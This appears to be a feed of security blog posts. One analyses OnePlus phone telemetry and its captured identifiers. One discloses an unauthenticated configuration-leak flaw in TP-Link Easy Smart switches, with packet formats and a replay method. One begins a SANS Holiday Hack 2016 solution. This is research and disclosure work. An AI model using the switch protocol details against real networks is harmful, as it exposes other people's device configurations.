Our first question is what am I connecting to at open.oneplus.net. Obviously the top level domain oneplus.net belongs to the manufacturer of the device, but what’s with the open bit? Doing a DNS lookup, we can find that this points to an Amazon AWS instance with mention of Apache Hadoop in the record, located in the us-east-1 region.

So the next question is what is being sent here? From the example screenshot, we see two requests being sent over HTTPS; the first (not pictured) sending authentication information to /oauth/token and the second, more interesting request, to /cloud/pushdata/ with two parameters; access_token which was the OAuth token returned from the first request, and data which appears to be Base64 encoded.

Decoding the Base64 parameter gives us some JSON, show below (formatting mine)

{
    "ty": 3,
    "dl": [
        {
            "id": "258cfeb1",
            "en": "screen_off",
            "ts": 1484177517017,
            "oed": [],
            "it": 0,
            "rv": "OnePlus2Oxygen_14.A.27_GLO_027_1612271635"
        }, {
            "id": "258cfeb1",
            "en": "screen_on",
            "ts": 1484177826984,
            "oed": [],
            "it": 0,
            "rv": "OnePlus2Oxygen_14.A.27_GLO_027_1612271635"
        }, {
            "id": "258cfeb1",
            "en": "unlock",
            "ts": 1484177827961,
            "oed": [],
            "it": 0,
            "rv": "OnePlus2Oxygen_14.A.27_GLO_027_1612271635"
        }, {
            "id": "258cfeb1",
            "en": "abnormal_reboot",
            "ts": 1484178427035,
            "oed": [],
            "it": 0,
            "rv": "OnePlus2Oxygen_14.A.27_GLO_027_1612271635"
        }, ...
    ]
}

OK, so it looks like they’re collecting timestamped (the ts field is the event time in milliseconds since unix epoch, which we’ll be seeing more of) metrics on certain events, some of which I understand - from a development point of view, wanting to know about abnormal reboots seems legitimate - but the screen on/off and unlock activities feel excessive. At least these are anonymised, right? Well, not really - taking a closer look at the ID field, it seems familiar; this is my phone’s serial number. This I’m less enthusiastic about, as this can be used by OnePlus to tie these events back to me personally (but only because I bought the handset directly from them, I suppose).

I leave the traffic proxied for some time, to see what other information is collected, and boy am I in for a shock…

{
    "ty": 1,
    "dl": [
        {
            "ac": "",
            "av": "6.0.1",
            "bl": 82,
            "br": "OnePlus",
            "bs": "CHARGING",
            "co": "GB",
            "ga": 11511,
            "gc": 234,
            "ge": 6759424,
            "gn": 30,
            "iac": 1,
            "id": "258cfeb1",
            "im": "123456789012345,987654321098765",
            "imei1": "123456789012345",
            "it": 0,
            "la": "en",
            "log": "",
            "ma": "aa:bb:cc:dd:ee:ff",
            "mdmv": "1.06.160427",
            "mn": "ONE A2003",
            "nci": "23430,",
            "ncn": ",",
            "noi": "23430,",
            "non": "EE,",
            "not": "LTE,",
            "npc": "gb,",
            "npn": "07123456789,07987654321",
            "nwa": "aa:bb:cc:dd:ee:ff",
            "nwb": "ff:ee:dd:cc:bb:aa",
            "nwh": false,
            "nwl": 0,
            "nws": "\"CHRISDCMOORE\"",
            "ov": "Oxygen ONE A2003_24_161227",
            "pcba": "",
            "rh": 1920,
            "ro": false,
            "romv": "3.5.6",
            "rw": 1080,
            "sov": "A.27",
            "ts": 1484487017633,
            "tz": "GMT+0000"
        }
    ]
}

Amongst other things, this time we have the phone’s IMEI(s), phone numbers, MAC addresses, mobile network(s) names and IMSI prefixes, as well as my wireless network ESSID and BSSID and, of course, the phone’s serial number. Wow, that’s quite a bit of information about my device, even more of which can be tied directly back to me by OnePlus and other entities.

It gets worse.

{
    "ty": 4,
    "dl": [{
            "id": "258cfeb1",
            "pn": "com.Slack20003701",
            "pvc": "20003701",
            "tk": [
                [1484079940460, 1484079952177],
                [1484081525486, 1484081603191],
                [1484081603424, 1484081619211],
                ...
            ],
            "it": 0
        }, {
            "id": "258cfeb1",
            "pn": "com.microsoft.office.outlook170",
            "pvc": "170",
            "tk": [
                [1484084321735, 1484084333336],
                [1484084682578, 1484084683668],
                [1484084685843, 1484084688985],
                ...
            ],
            "it": 0
        }, ...
    ]
}

Those are timestamp ranges (again, unix epoch in milliseconds) of the when I opened and closed applications on my phone. From this data we can see that on Tuesday, 10th Jan 2017, I had Slack open between 20:25:40 UTC and 20:25:52 UTC, and the Microsoft Outlook app open between 21:38:41 UTC and 21:38:53 UTC, to take just two examples, again stamped with my phone’s serial number.

It gets even worse.

{
    "ty": 2,
    "dl": [{
            "id": "258cfeb1",
            "pi": 12795,
            "si": "127951484342058637",
            "ts": 1484342058637,
            "pn": "com.android.chrome",
            "pvn": "55.0.2883.91",
            "pvc": 288309101,
            "cn": "ChromeTabbedActivity",
            "en": "start",
            "aed": [],
            "sa": true,
            "it": 0,
            "rv": "OnePlus2Oxygen_14.A.27_GLO_027_1612271635"
        }, ... {
            "id": "258cfeb1",
            "pi": 4143,
            "si": "41431484342115589",
            "ts": 1484342115589,
            "pn": "com.android.systemui",
            "pvn": "1.1.0",
            "pvc": 0,
            "cn": "RecentsActivity",
            "en": "stop",
            "aed": [],
            "sa": true,
            "it": 0,
            "rv": "OnePlus2Oxygen_14.A.27_GLO_027_1612271635"
        }, {
            "id": "258cfeb1",
            "pi": 26449,
            "si": "264491484342115620",
            "ts": 1484342115620,
            "pn": "com.android.settings",
            "pvn": "6.0.1",
            "pvc": 23,
            "cn": "WifiSettingsActivity",
            "en": "start",
            "aed": [],
            "sa": true,
            "it": 0,
            "rv": "OnePlus2Oxygen_14.A.27_GLO_027_1612271635"
        }, ... {
            "id": "258cfeb1",
            "pi": 2608,
            "si": "26081484346421908",
            "ts": 1484346421908,
            "pn": "com.android.settings",
            "pvn": "6.0.1",
            "pvc": 23,
            "cn": "Settings",
            "en": "start",
            "aed": [],
            "sa": true,
            "it": 0,
            "rv": "OnePlus2Oxygen_14.A.27_GLO_027_1612271635"
        }, ...
    ]
}

These event data contain timestamps of which activities were fired up in which in applications, again stamped with the phone’s serial number.

I took to Twitter to ask OnePlus on Twitter how this could be turned off, which disappointingly led down the usual path of “troubleshooting” suggestions, before being met with radio silence:

Hey @OnePlus_Support, it's none of your business when I turn my screen on/off or unlock my phone - how do I turn this off? /cc:@troyhunt pic.twitter.com/VihaIDI6wP
— Christopher Moore (@chrisdcmoore) January 13, 2017

@chrisdcmoore Try wiping out the cache.Turn off your device>Power key + volume down>English>Wipe and cache>Wipe Cache>Confirm wipe>Reboot.
— OnePlus Support (@OnePlus_Support) January 13, 2017

@chrisdcmoore Alright. Please try doing a hard reset https://t.co/1qyq9XajiJ and see if there are improvements.
— OnePlus Support (@OnePlus_Support) January 13, 2017

A member of the community, @VenomSarad, who had noticed my tweets suggested that, even if they wanted to, OnePlus support were not allowed to suggest disabling applications, and that my time might be better spent looking on their forums:

@chrisdcmoore @OnePlus_Support The support team isn't allowed tell people to disable apps. You may want to go to OnePlus forum for this
— Sarad (@VenomSarad) January 14, 2017

I did some searching for any other mentions of this analytics data collection, and came across a few forum posts of varying relevance, the closest being this one, as well as a thread on Reddit based off of a tweet from July 2016 rather closely mirroring my own sentiments:

@oneplus Why are you collecting timestamps of when I unlock my phone, and when the screen turns on/off? #caught https://t.co/ejt4p9uPFn
— Tux (@__Tux) July 15, 2016

Reading through the Reddit thread, we learn that the code responsible for this data collection is part of the OnePlus Device Manager and the OnePlus Device Manager Provider, which run the OneplusAnalyticsJobService under the OnePlus System Service. In my case, these services had sent 16MB of data in approximately 10 hours.

Using pm to locate the application package files, we find that it is located at /system/priv-app/OPDeviceManager/OPDeviceManager.apk. Grabbing the APK and extracting it using apktool gives us the manifest and some resources, but no bytecode - this is because, as a system application, it has been optimised, so the classes.dex file has been removed from the APK archive, optimised into an architecture-specific .odex file and placed at, in my case, /system/priv-app/OPDeviceManager/oat/arm64/OPDeviceManager.pdex.

Running this, in combination with boot.oat, through baksmali gives us the bytecode for further analysis. The OnePlus Device Manager (OPDM) which drives the Oneplus System Service, utilises a bunch of libraries - some expected, given the data we’ve seen, and others less so - such as com.google.gson and com.squareup.okhttp for serialisation and making requests, but also namespaces which imply geolocation functionality such as com.amap.api, com.autonavi.aps.amapapi.

Here’s a list of the public methods in net/oneplus/odm/common/Utils.smali, just to give us a good idea for some of the breadth of this functionality, and an indication of some of the kinds of data it might collate:

.method public static encodeToBase64(Ljava/lang/String;)Ljava/lang/String;
.method public static getAndroidVersion()Ljava/lang/String;
.method public static getBSSID(Landroid/content/Context;)Ljava/lang/String;
.method public static getBatteryLevel(Landroid/content/Context;)F
.method public static getBatteryStatus(Landroid/content/Context;)Ljava/lang/String;
.method public static getBrandName()Ljava/lang/String;
.method public static getCellSignalLevel(Landroid/content/Context;)Ljava/lang/String;
.method public static getDeviceId()Ljava/lang/String;
.method public static getIMEI(Landroid/content/Context;)Ljava/lang/String;
.method public static getIMEI1(Landroid/content/Context;)Ljava/lang/String;
.method public static getIsHiddenSSID(Landroid/content/Context;)Z
.method public static getLocale(Landroid/content/Context;)Ljava/util/Locale;
.method public static getMacAddr(Landroid/content/Context;)Ljava/lang/String;
.method public static getModelName()Ljava/lang/String;
.method public static getOSVersion()Ljava/lang/String;
.method public static getPCBA()Ljava/lang/String;
.method public static getResolutionHeight(Landroid/content/Context;)I
.method public static getResolutionWidth(Landroid/content/Context;)I
.method public static getRomVersion()Ljava/lang/String;
.method public static getSimCountryCode(Landroid/content/Context;)Ljava/lang/String;
.method public static getSoftVersion()Ljava/lang/String;
.method public static getTimezone()Ljava/lang/String;
.method public static getWifiMacAddress(Landroid/content/Context;)Ljava/lang/String;
.method public static getWifiSSID(Landroid/content/Context;)Ljava/lang/String;
.method public static getWifiSignalLevel(Landroid/content/Context;)I
.method public static isH2()Z
.method public static isO2()Z
.method public static isRooted()Z

Unfortunately, as a system service, there doesn’t appear to be any way of permanently disabling this data collection or removing this functionality without rooting the phone. One alternative would be to stop the service every time you boot your phone (assuming it doesn’t get periodically restarted) or using an app to achieve the same effect, or perhaps prevent communication with open.oneplus.net somehow.

This kind of data collection, especially one containing information that can be directly tied back to me as an individual, should really be opt-in and/or have an easily accessible off switch…

Information disclosure vulnerability in TP-Link Easy Smart switches

Tue, 06 Jun 2017 00:00:00 +0000

Note: since beginning this research back in February, another security researcher @chmod750 has independently discovered and disclosed much of what I am about to talk about!

Introduction

I recently acquired a TP-Link TL-SG108E (V1) Easy Smart switch. The Easy Smart range of switches from TP-Link are targeted at the advanced consumer market; they have some enterprise-class managed switching features such as VLAN tagging and port mirroring, but come with consumer-level hardware, price tag and, as we’ll see, management features.

The TL-SG108E lacks the usual telnet/SSH command-line interface and web interface that you might expect for managed networking equipment. Instead management takes place solely via a Java GUI application - the Easy Smart Configuration Utility (ESCU).

Upon startup, the ESCU goes through a discovery phase to look for Easy Smart switches on your network. After discovery, you have the ability to view some basic information about each switch, change a switch’s network configuration (provided you know the credentials for the switch), or you can log in to the switch in order to manage all of its features. See the TP-Link manual for a thorough run-down of the management utility.

Management traffic

Let’s take a look at what is happening behind the scenes by using Wireshark to examine the network traffic sent by the utility and the switch.

Discovery phase

During the discovery phase, a UDP packet is sent from each of my network interfaces with source port 29809 to the IPv4 broadcast address 255.255.255.255, destination port 29808.

Each switch that receives this discovery probe sends a reply in the form of a UDP packet with source port 29808 to the IPv4 broadcast address 255.255.255.255, destination port 29809.

Notice that there was no need for switch to reply on the broadcast address - it would have known who was looking for it by examining the source IP address and could have replied over unicast rather than announcing its presence to the whole network.

Once the discovery phase has finished, the utility lists the discovered switch and provides two options - I can click the cog icon underneath the “IP Setting” heading which provides a quick way of changing the switch’s management network settings (providing I have the administrative username and password) or I can click the person silhouette icon underneath the “Login” heading which will prompt me for a username and password and, if they are correct, drop me into the main part of the application which allows me to view and modify all of the switch’s features.

Logon and management phase

The traffic which passes over the wire whilst logging in to a switch and exercising the mangement functionality continues in the same vein as the discovery traffic - the destination address for the traffic is always 255.255.255.255, meaning that anyone on the local network will see this communcation in its entirety. This is less than ideal, but at first glance the contents of the traffic is not easily readable.

A quick Google on the topic turned up an excellent blog post from Pentest Parners from mid-2016 which covers these same concerns and, furthermore, they determined that the management traffic is encrypted using a key which is hard-coded in the switch firmware and in the configuration utility.

As that article explains, if you’re managing one of these switches whilst someone is listening elsewhere on the same network, then they get to see everything; the switch’s management credentials, configuration and changes you make to the configuration.

This requires patience on the attacker’s part - they have to be fortunate enough to be capturing traffic whilst the switch is being legitimately managed. Let’s dive a little further and look at the mangement protocol itself to see if there are active attacks we can use against the switch.

The Easy Smart Configuration Protocol (ESCP)

Armed with the crypto key from decompiling the configuration utility, we can begin to examine the payload of the management traffic in its unencrypted form and compare it with the actions we carry out in the utility.

From manually reverse engineering the traffic, and inspecting the decompiled utility, it would appear that all of the packets have a 32 byte header that looks like this:

VV TT SS SS SS SS SS SS CC CC CC CC CC CC QQ QQ
EE EE EE EE LL LL FF FF 00 00 KK KK XX XX XX XX

with the following fields (everything’s big-endian):

VV - protocol version (0x01 in my case)
TT - packet type
- 00 for discovery probe
- 01 for GET request
- 02 for GET/discovery response
- 03 for SET/login request
- 04 for SET response
SS SS SS SS SS SS - the MAC address of the switch (filled with zeros for discovery probes)
CC CC CC CC CC CC - the MAC address of the management client
QQ QQ - a sequence number, the same request/response pairs for correlation
EE EE EE EE - error code, (filled with zeroes for OK)
LL LL - packet length, including this header
FF FF - Fragementation offset, for when requests/responses are too big for one packet
00 00 - Unused, as far as I can tell
KK KK - A token of some description, which is refeshed before login and set requests
XX XX XX XX - A checksum, which is unused (I’ve only every seen it filled with zeroes)

Following the header is the payload, which is zero or more (Type, Length, Value) tuples (I’m going to call these TLVs), with Type and Length being two bytes each, and Value having a length of, well, Length. Finally, the packet is completed with a byte sequence of FF FF 00 00.

GET requests

To make this more concrete, let’s have a look at a request-reply pair of packets which pass over the wire when we navigate to the “Switching” -> “Port Setting” part of the configuration utility (pictured below).

Request

 01 01 66 55 44 33 22 11 aa bb cc dd ee ff 03 ba  ....m..fx$...G..
 00 00 00 00 00 28 00 00 00 00 24 78 00 00 00 00  .....(....$x....
 10 00 00 00 ff ff 00 00

Here we see a packet type of 01 indicating this is a GET request, of length 0x28, intended for switch with MAC address 66:55:44:33:22:11, from management client MAC address aa:bb:cc:dd:ee:ff, and there is one TLV with type 10 00 (which means switchport configuration) and length zero.

Reply

 01 02 66 55 44 33 22 11 aa bb cc dd ee ff 03 ba  ....m..fx$...G..
 00 00 00 00 00 7c 00 00 00 00 24 78 00 00 00 00  .....|....$x....
 10 00 00 07 01 01 00 01 06 00 00 10 00 00 07 02  ................
 01 00 01 06 00 00 10 00 00 07 03 01 00 01 06 00  ................
 00 10 00 00 07 04 01 00 01 06 00 00 10 00 00 07  ................
 05 01 00 01 06 00 00 10 00 00 07 06 01 00 01 00  ................
 00 00 10 00 00 07 07 01 00 01 05 00 00 10 00 00  ................
 07 08 01 00 01 05 00 00 ff ff 00 00              ............

Here we see a packet type of 02 indicating this is a GET response of length 0x7c with the same MAC address fields set. Here we see eight TLVs (which unsurprisingly corresponds with the number of ports on the switch) each of type 10 00 and having length 7. Putting them on separate rows and comparing them with the screenshot above, we start to see how each byte of the TLV’s value might correspond with the status of the switchport, as it is shown in the UI.

10 00 00 07 01 01 00 01 06 00 00
10 00 00 07 02 01 00 01 06 00 00
10 00 00 07 03 01 00 01 06 00 00
10 00 00 07 04 01 00 01 06 00 00
10 00 00 07 05 01 00 01 06 00 00
10 00 00 07 06 01 00 01 00 00 00
10 00 00 07 07 01 00 01 05 00 00
10 00 00 07 08 01 00 01 05 00 00
            ^  ^  ^  ^  ^  ^  ^
Port # ─────┘  │  │  │  │  │  │
Enabled ───────┘  │  │  │  │  │
LAG ──────────────┘  │  │  │  │
Speed (configured) ──┘  │  │  │
Speed (actual) ─────────┘  │  │
Flow control (configured) ─┘  │
Flow control (actual) ────────┘

Writing a Wireshark dissector to decrypt the packets and dissect parts of the protocol, we see this better represented visually below.

The vulnerability

Notice that the above request did not contain any credentials, unlike SET/login requests which always contain TLVs containing the username and password. That leaves us with two possibilites; there are other authentication mechanisms in play, or the switch discloses its configuration to anyone who asks for it.

Looking back to the structure of the packet header, remember there was a two-byte “token” value. Whenever the configuration utility initiates a SET/login request (which always contains the management credentials), a GET request is made first to refresh this token. Perhaps the switch verifies that the token which accompanies a GET request to “sensitive” information (where sensitive here is defined as any information which the UI would not expose until you’ve logged into the switch) has been authenticated?

To test this, we send a copy of the request (from another host on the network which has had no management interactions with the switch up until now), with the token set to a random value. The switch replies just the same as it did with the previous, authentic request.

So we have ourselves a information disclosure vulnerability - anyone on the network can ask the switch for its various configuration parameters without authentication. This includes the configuration and status of the switchports, names and tags for configured VLANs and member ports, QoS settings, port mirror settings and much more.

Solving the SANS Holiday Hack Challenge 2016

Thu, 05 Jan 2017 00:00:00 +0000

Introduction

Every year, the folks at Counter Hack Challenges run a cyber security challenge for people to enjoy over the festive season, and this year it’s a corker.

Head over to the challenge site to set the scene, have a look at the questions, and have a go for yourself before reading my solution below!

Part 1: A Most Curious Business Card

First, we examine Santa’s business card to see if it contains any clues which might help us get started on our adventure. We see a Twitter handle of @santawclaus and a similar Instagram handle of santawclaus.

A glance at the Twitter stream at first seems like Santa has been spouting gobbledygook, but perhaps there is a hidden message? We use the following python script to pull all the tweets for further analysis.

from HTMLParser import HTMLParser
from twitter import *

access_key = "ACCESS_KEY_HERE"
access_secret = "ACCESS_SECRET_HERE"
consumer_key = "CONSUMER_KEY_HERE"
consumer_secret = "CONSUMER_SECRET_HERE"

twitter = Twitter(auth = OAuth(access_key,
                               access_secret,
                               consumer_key,
                               consumer_secret))

user = "santawclaus"
statuses = []
max_id = 798175529463676928
html_parser = HTMLParser()

while True:
    results = twitter.statuses.user_timeline(screen_name = user,
                                             count = 200,
                                             max_id = max_id)

    if len(results) == 0:
       break

    statuses += [html_parser.unescape(x['text']) for x in results]

    max_id = min([x['id'] for x in results]) - 1


for status in statuses:
    print status

and the hidden message of BUG BOUNTY becomes plain as day:

SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO
GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ
GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ
JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS
CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF
HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ
GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ
NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ
SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ
SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ
NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY
PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF
JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS
NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH
SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF
GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY
NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO
NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF
SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF
ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY
JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH
HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ
JOYPEACEONEARTHELFf.......)JOYQ@........??'.......]SANTAPEACEONEARTHHOHOHOQ
JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY
SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY
GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ
HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ
CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ
GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ
CHRISTMASHOHOHOELFQQ...............dQ,..........<GOODWILLTOWARDSMENHOHOHOQQ
GOODWILLTOWARDSMENQQL.............<QQm,........_HOHOHOHOHOHOCHRISTMASELFELF
SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ
CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ
PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA
ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ
ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ
ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH
GOODWILLTOWARDSMENJOYGOODWILLTOWARDSMENGOODWILLTOWARDSMENSANTAELFJOYJOYJOYQ
ELFSANTAPEACEONEARTHJOYJOYQQDT????????????????????4NORTHPOLEPEACEONEARTHELF
NORTHPOLENORTHPOLESANTAQWT^.......................]NORTHPOLEELFHOHOHOJOYELF
HOHOHOHOHOHOCHRISTMASQQP`.........................]JOYGOODWILLTOWARDSMENELF
ELFPEACEONEARTHSANTAQQ(...........................]HOHOHOSANTACHRISTMASJOYQ
JOYJOYCHRISTMASELFJOY(............................]GOODWILLTOWARDSMENHOHOHO
CHRISTMASELFELFELFQQf.............................]HOHOHONORTHPOLEJOYELFJOY
SANTACHRISTMASJOYQQD..............................]HOHOHOHOHOHOSANTASANTAQQ
HOHOHOELFSANTAELFQQ(..............................]GOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMENW...............................]NORTHPOLEHOHOHOHOHOHOJOY
CHRISTMASHOHOHOJOYF...............................]GOODWILLTOWARDSMENSANTAQ
CHRISTMASCHRISTMAS[.........._aaaaaaaaaaaaaaaaaaaajPEACEONEARTHELFNORTHPOLE
SANTANORTHPOLEELFQ(........jJOYQWQWWQWWQWWWWWWWWWGOODWILLTOWARDSMENHOHOHOQQ
ELFPEACEONEARTHELF;.......jWWSANTAGOODWILLTOWARDSMENSANTAGOODWILLTOWARDSMEN
ELFJOYNORTHPOLEJOY`.......QWGOODWILLTOWARDSMENGOODWILLTOWARDSMENCHRISTMASQQ
PEACEONEARTHJOYELF.......]WPEACEONEARTHCHRISTMASNORTHPOLEPEACEONEARTHHOHOHO
CHRISTMASJOYHOHOHO.......]HOHOHOELFGOODWILLTOWARDSMENPEACEONEARTHCHRISTMASQ
JOYCHRISTMASJOYELF.......]PEACEONEARTHCHRISTMASGOODWILLTOWARDSMENELFHOHOHOQ
JOYPEACEONEARTHJOY.......)WGOODWILLTOWARDSMENSANTANORTHPOLEJOYPEACEONEARTHQ
CHRISTMASHOHOHOELF........$WPEACEONEARTHNORTHPOLESANTAPEACEONEARTHSANTAJOYQ
JOYHOHOHOELFELFJOY;.......-QWCHRISTMASGOODWILLTOWARDSMENPEACEONEARTHJOYELFQ
HOHOHOCHRISTMASJOY(........-?$QWJOYCHRISTMASSANTACHRISTMASCHRISTMASHOHOHOQQ
ELFJOYELFCHRISTMASf...............................]PEACEONEARTHNORTHPOLEJOY
ELFHOHOHOSANTAELFQh...............................]GOODWILLTOWARDSMENHOHOHO
SANTACHRISTMASELFQQ,..............................]PEACEONEARTHPEACEONEARTH
GOODWILLTOWARDSMENQL..............................]HOHOHOELFCHRISTMASSANTAQ
GOODWILLTOWARDSMENQQ,.............................]PEACEONEARTHELFHOHOHOJOY
NORTHPOLESANTAHOHOHOm.............................]HOHOHOGOODWILLTOWARDSMEN
PEACEONEARTHCHRISTMASg............................]ELFHOHOHOSANTANORTHPOLEQ
NORTHPOLECHRISTMASJOYQm,..........................]NORTHPOLECHRISTMASSANTAQ
SANTASANTACHRISTMASSANTAw,........................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWQga,,....................]PEACEONEARTHPEACEONEARTH
PEACEONEARTHJOYCHRISTMASELFWCHRISTMASGOODWILLTOWARDSMENJOYPEACEONEARTHSANTA
PEACEONEARTHPEACEONEARTHCHRISTMASJOYSANTAPEACEONEARTHCHRISTMASELFHOHOHOELFQ
GOODWILLTOWARDSMENNORTHPOLECHRISTMASPEACEONEARTHHOHOHOELFJOYNORTHPOLEELFELF
JOYGOODWILLTOWARDSMENSANTACHRISTMASJOYPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOQ
HOHOHOCHRISTMASHOHOHOSANTANORTHPOLEPEACEONEARTHJOYPEACEONEARTHJOYJOYHOHOHOQ
JOYELFGOODWILLTOWARDSMENSANTAQBTT???TT$SANTASANTAPEACEONEARTHNORTHPOLEJOYQQ
SANTACHRISTMASCHRISTMASJOYWP"`.........-"9NORTHPOLEPEACEONEARTHCHRISTMASELF
SANTAELFELFELFSANTAJOYQQWP`...............-4JOYSANTANORTHPOLEJOYSANTASANTAQ
ELFELFELFHOHOHOHOHOHOQQ@'..................."$CHRISTMASELFSANTANORTHPOLEELF
ELFCHRISTMASSANTAELFQQP`.....................-$WELFWPEACEONEARTHSANTASANTAQ
SANTANORTHPOLEJOYELFQE........................-$SANTAELFWGOODWILLTOWARDSMEN
NORTHPOLEELFELFELFQQ@`.........................-QWPEACEONEARTHPEACEONEARTHQ
PEACEONEARTHJOYJOYQQ(...........................]CHRISTMASHOHOHOELFSANTAJOY
HOHOHOCHRISTMASELFQP.............................$NORTHPOLEJOYQWJOYWJOYWELF
SANTACHRISTMASJOYQQ(.............................]WSANTAWPEACEONEARTHJOYELF
HOHOHOSANTAJOYELFQW............_aaaas,............QWCHRISTMASQWHOHOHOSANTAQ
SANTAPEACEONEARTHQf........._wELFWWWWQQw,.........3ELFHOHOHOJOYJOYSANTAELFQ
CHRISTMASSANTAELFQ[........<HOHOHOELFELFQc........]CHRISTMASPEACEONEARTHELF
CHRISTMASCHRISTMAS(......._PEACEONEARTHJOY/.......)NORTHPOLESANTAELFQWELFWQ
PEACEONEARTHSANTAQ`.......dNORTHPOLEHOHOHOm.......:NORTHPOLEWCHRISTMASJOYQQ
PEACEONEARTHELFELF........SANTANORTHPOLEJOY;.......SANTASANTAJOYQWSANTAJOYQ
PEACEONEARTHSANTAQ.......]ELFSANTAJOYJOYELF[.......GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMEN.......]ELFNORTHPOLEJOYQQf.......ELFSANTAJOYHOHOHOQQWELFQ
GOODWILLTOWARDSMEN.......]ELF.......]JOYELF[.......PEACEONEARTHPEACEONEARTH
HOHOHOJOYNORTHPOLE.......]JOY.......]SANTAQ'.......SANTASANTAQQWNORTHPOLEQQ
CHRISTMASNORTHPOLE:......)WQQ.......]SANTAD........NORTHPOLESANTAELFWELFJOY
ELFCHRISTMASSANTAQ;......-JOY.......]ELFQW'.......:PEACEONEARTHCHRISTMASJOY
CHRISTMASSANTAELFQ[.......WQQ.......]ELFD'........=HOHOHOGOODWILLTOWARDSMEN
ELFELFSANTAJOYELFQL.......]QQ.......]ELF..........]PEACEONEARTHQWCHRISTMASQ
NORTHPOLESANTAELFQm.......+QQ.......]ELF;.........jWNORTHPOLENORTHPOLEELFWQ
JOYELFHOHOHOSANTAQQ.................]JOY[.........mCHRISTMASCHRISTMASQQWELF
NORTHPOLENORTHPOLEQ[................]JOYL........_PEACEONEARTHSANTASANTAELF
SANTANORTHPOLEJOYQQm................]ELFk........dHOHOHOPEACEONEARTHQQWJOYQ
PEACEONEARTHHOHOHOQQc...............]JOYm.......]PEACEONEARTHHOHOHOWHOHOHOQ
CHRISTMASHOHOHOJOYQQm...............]ELFQ......_GOODWILLTOWARDSMENNORTHPOLE
JOYELFNORTHPOLEJOYELFL..............]JOYQ;....<SANTAHOHOHONORTHPOLEELFSANTA
PEACEONEARTHELFHOHOHOQ,.............]JOYQ[...wPEACEONEARTHELFSANTAWHOHOHOQQ
CHRISTMASELFELFELFJOYQ6.............]ELFQL_wPEACEONEARTHHOHOHOCHRISTMASELFQ
HOHOHOJOYNORTHPOLEQWELFwaaaaaaaaaaaajPEACEONEARTHGOODWILLTOWARDSMENSANTAQWQ
CHRISTMASELFPEACEONEARTHWWWQWWQWWWWELFELFSANTANORTHPOLESANTAELFQQWJOYHOHOHO
CHRISTMASNORTHPOLEHOHOHOHOHOHOCHRISTMASGOODWILLTOWARDSMENNORTHPOLEHOHOHOWQQ
GOODWILLTOWARDSMENNORTHPOLENORTHPOLESANTANORTHPOLEJOYSANTAELFELFWCHRISTMASQ
GOODWILLTOWARDSMENHOHOHOHOHOHONORTHPOLEELFSANTAELFNORTHPOLEPEACEONEARTHELFQ
PEACEONEARTHELFELFQWPEACEONEARTHPEACEONEARTHHOHOHOPEACEONEARTHWNORTHPOLEWQQ
ELFPEACEONEARTHCHRISTMASELFPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENSANTAQ
